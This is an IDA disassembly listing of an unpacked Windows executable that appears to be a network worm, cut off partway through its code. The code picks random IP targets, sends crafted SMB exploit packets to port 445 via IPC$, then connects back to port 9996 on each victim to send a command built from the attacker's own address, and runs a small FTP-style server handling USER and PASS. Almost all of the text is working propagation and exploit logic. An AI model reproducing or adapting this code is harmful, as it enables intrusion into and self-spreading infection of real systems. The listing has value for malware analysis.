;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 97A4355156D7011F77D47EB954F71C02
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
HEADER segment page public 'DATA' use32
assume cs:HEADER
;org 400000h
__ImageBase dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0
dd 40h, 0
db ' ',0
align 4
dd 5 dup(0)
dd 100h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 915E25D4h, 3 dup(0C2304490h), 0C23A5B78h, 0C230448Ah
dd 0C23E5813h, 0C230449Bh, 0C2314490h, 0C23044D9h, 0C2235BF2h
dd 0C2304499h, 0C23B5B78h, 0C2304494h, 0C2364228h, 0C2304491h
dd 68636952h, 0C2304490h, 2 dup(0)
dd 4550h, 2014Ch, 4093E764h, 2 dup(0)
dd 10F00E0h, 6010Bh, 3E00h, 2200h, 0
dd 19010h, 1000h, 4550h, 3014Ch, 3 dup(0)
dd 10F00E0h, 6010Bh, 3E00h, 2200h, 0
aFip db 'ӑP|',0
db 10h, 2 dup(0)
dd 5000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 22000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 21000h, 5C8h, 9000h, 10h, 1Ah dup(0)
a_text db '.text',0
align 10h
dd 8000h, 1000h, 6600h, 400h, 50454332h, 2 dup(0)
dd 0E0000020h, 7273722Eh, 63h, 18000h, 9000h, 11C00h, 6A00h
dd 3 dup(0)
dd 0E0000020h, 6164692Eh, 6174h, 1000h, 21000h, 1000h
dd 18600h, 3 dup(0)
dd 0E0000020h, 64h dup(0)
align 1000h
HEADER ends
; File Name : u:\work\97a4355156d7011f77d47eb954f71c02_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00006600 ( 26112.)
; Offset to raw data for section: 00000400
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_402029+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_402029+24�p
WSAData = WSAData ptr -190h
sub esp, 190h
lea eax, [esp+190h+WSAData]
push eax ; lpWSAData
push 101h ; wVersionRequested
call WSAStartup ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401045(char *cp)
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
cp = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+cp] ; cp
call inet_addr ; inet_addr
movsx ecx, al
mov [ebp+cp], eax
movsx edx, byte ptr [ebp+cp+2]
movsx esi, byte ptr [ebp+cp+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
name = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+name]
push 0FFh ; namelen
push eax ; name
call gethostname ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+name]
push eax ; name
call gethostbyname ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax] ; in
call inet_ntoa ; inet_ntoa
mov ebx, eax
push ebx ; cp
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call lstrcpy ; lstrcpy
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
name = sockaddr ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+name]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push 1BDh ; hostshort
call htons ; htons
push [ebp+arg_0] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_4011D5
mov dword ptr [ebp+name.sa_data+2], eax
push 8
lea eax, [ebp+name.sa_data+6]
push 0
push eax
call sub_4021B0
add esp, 10h
push 6 ; protocol
push 1
pop ebx
push ebx ; type
push 2 ; af
call socket ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push esi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi ; s
call closesocket ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4011D5(char *name)
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
name = dword ptr 4
push esi
push edi
mov edi, [esp+8+name]
push edi ; cp
call inet_addr ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi ; name
call gethostbyname ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401210(LPCCH lpBuffer)
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
Buffer = byte ptr -14h
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F34
push edi
push dword_406F34
lea eax, [ebp+Buffer]
push offset aI ; "%i"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 0Ch
push 0 ; iAttribute
push offset PathName ; "c:\\win2.log"
call _lcreat ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+Buffer]
push esi
push eax
call sub_402210
mov esi, _hwrite
pop ecx
push eax ; lBytes
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push edi ; hFile
call esi ; _hwrite
push [ebp+lpBuffer]
call sub_402210
pop ecx
push eax ; lBytes
push [ebp+lpBuffer] ; lpBuffer
push edi ; hFile
call esi ; _hwrite
push edi ; hFile
call _lclose ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40127D(DWORD lpBuffer)
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_34C = dword ptr -34Ch
buf = byte ptr -33Ch
var_110 = byte ptr -110h
name = sockaddr ptr -10h
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+name]
push ebx
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push 270Ch ; hostshort
call htons ; htons
push [ebp+lpBuffer] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_4011D5
mov dword ptr [ebp+name.sa_data+2], eax
push 8
lea eax, [ebp+name.sa_data+6]
push ebx
push eax
call sub_4021B0
add esp, 10h
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset byte_406F38
push eax
call lstrcpy ; lstrcpy
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030 ; LPCSTR
lea eax, [ebp+buf]
push eax ; LPSTR
call wsprintfA ; wsprintfA
lea eax, [ebp+buf]
xor esi, esi
push eax
call sub_402210
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx ; flags
lea eax, [ebp+esi+buf]
push 1 ; len
push eax ; buf
push edi ; s
call send ; send
lea eax, [ebp+buf]
inc esi
push eax
call sub_402210
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+lpBuffer] ; lpBuffer
call sub_401210
mov [esp+34Ch+var_34C], 3E8h
call Sleep ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi ; s
call closesocket ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401398(char *s, LPSTR)
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
buf = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
s = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset byte_406F38
push [ebp+arg_4]
call lstrcpy ; lstrcpy
push [ebp+s]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402290
add esp, 2Ch
push [ebp+s] ; name
call gethostbyname ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi ; protocol
push 1 ; type
push 2 ; af
loc_401495: ; DATA XREF: .text:off_4065D8�o
call socket ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+s], esi
jz loc_401554
push 1BDh ; hostshort
mov [ebp+var_14], 2
call htons ; htons
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4021B0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h ; namelen
push eax ; name
push esi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, send
push edi ; flags
push 89h ; len
push offset buf ; buf
push esi ; s
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi ; flags
mov edi, 640h
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push esi ; s
mov esi, recv
call esi ; recv
push 0 ; flags
push 0A8h ; len
push offset byte_406258 ; buf
push [ebp+s] ; s
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0 ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
call esi ; recv
push 0 ; flags
push 0DEh ; len
push offset byte_406304 ; buf
push [ebp+s] ; s
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0 ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4] ; LPSTR
call wsprintfA ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+s] ; s
call closesocket ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
buf = byte ptr -754h
var_114 = byte ptr -114h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
name = sockaddr ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
s = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4025D0
mov eax, dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A38
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp-113h]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402290
add esp, 2Ch
push 270Ch ; hostshort
call htons ; htons
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402290
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4021B0
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402290
lea eax, [ebp+var_14]
push eax
call sub_402210
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402290
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4021B0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402290
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402290
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A2C
push eax
call sub_402290
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402290
add esp, 40h
push esi
call sub_402210
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402290
add esp, 10h
xor ecx, ecx
lea eax, [ebp-4813h]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4021B0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4021B0
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0 ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+s], edi
jz loc_401A7D
push 1BDh ; hostshort
mov [ebp+name.sa_family], 2
call htons ; htons
push [ebp+arg_0] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_4011D5
mov dword ptr [ebp+name.sa_data+2], eax
xor ebx, ebx
push 8
lea eax, [ebp+name.sa_data+6]
push ebx
push eax
call sub_4021B0
add esp, 10h
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, send
push ebx ; flags
push 89h ; len
push offset buf ; buf
push edi ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx ; flags
mov ebx, 640h
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push edi ; s
mov edi, recv
call edi ; recv
push 0 ; flags
push 0A8h ; len
push offset byte_406258 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 0DEh ; len
push offset byte_406304 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0 ; flags
push eax ; len
lea eax, [ebp+var_C4]
push eax ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 68h ; len
push offset byte_406448 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 0A0h ; len
push offset byte_4064B4 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402290
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402290
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402290
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402290
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402290
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402290
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402290
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402290
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0 ; flags
push 10FCh ; len
push eax ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 0FDCh ; len
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h ; dwMilliseconds
call Sleep ; Sleep
push [ebp+s] ; s
call closesocket ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401A84(DWORD s)
sub_401A84 proc near ; CODE XREF: sub_402029+3A�p
var_84 = byte ptr -84h
s = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+s]
lea eax, [ebp+var_84]
push eax ; LPSTR
push esi ; s
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A40
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi ; lpBuffer
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_401E65+74�o
PathName = byte ptr -8E4h
buf = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
name = sockaddr ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
s = dword ptr -0Ch
hFile = dword ptr -8
var_4 = word ptr -4
Buffer = byte ptr -2
var_1 = byte ptr -1
hostshort = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+hostshort]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0 ; flags
push off_4068D0
call sub_402210
mov esi, send
pop ecx
push eax ; len
push off_4068D0 ; buf
push ebx ; s
call esi ; send
mov edi, [ebp+hostshort]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: StartAddress+310�j
mov ebx, [ebp+hostshort]
loc_401B46: ; CODE XREF: StartAddress+39�j
push 0 ; flags
lea eax, [ebp+buf]
push 400h ; len
push eax ; buf
push ebx ; s
call recv ; recv
and [ebp+eax+buf], 0
mov [ebp+var_10], eax
lea eax, [ebp+buf]
push offset aUser ; "USER"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push off_4068D4
call sub_402210
pop ecx
push eax
push off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: StartAddress+73�j
lea eax, [ebp+buf]
push offset aPass ; "PASS"
push eax
call sub_402600
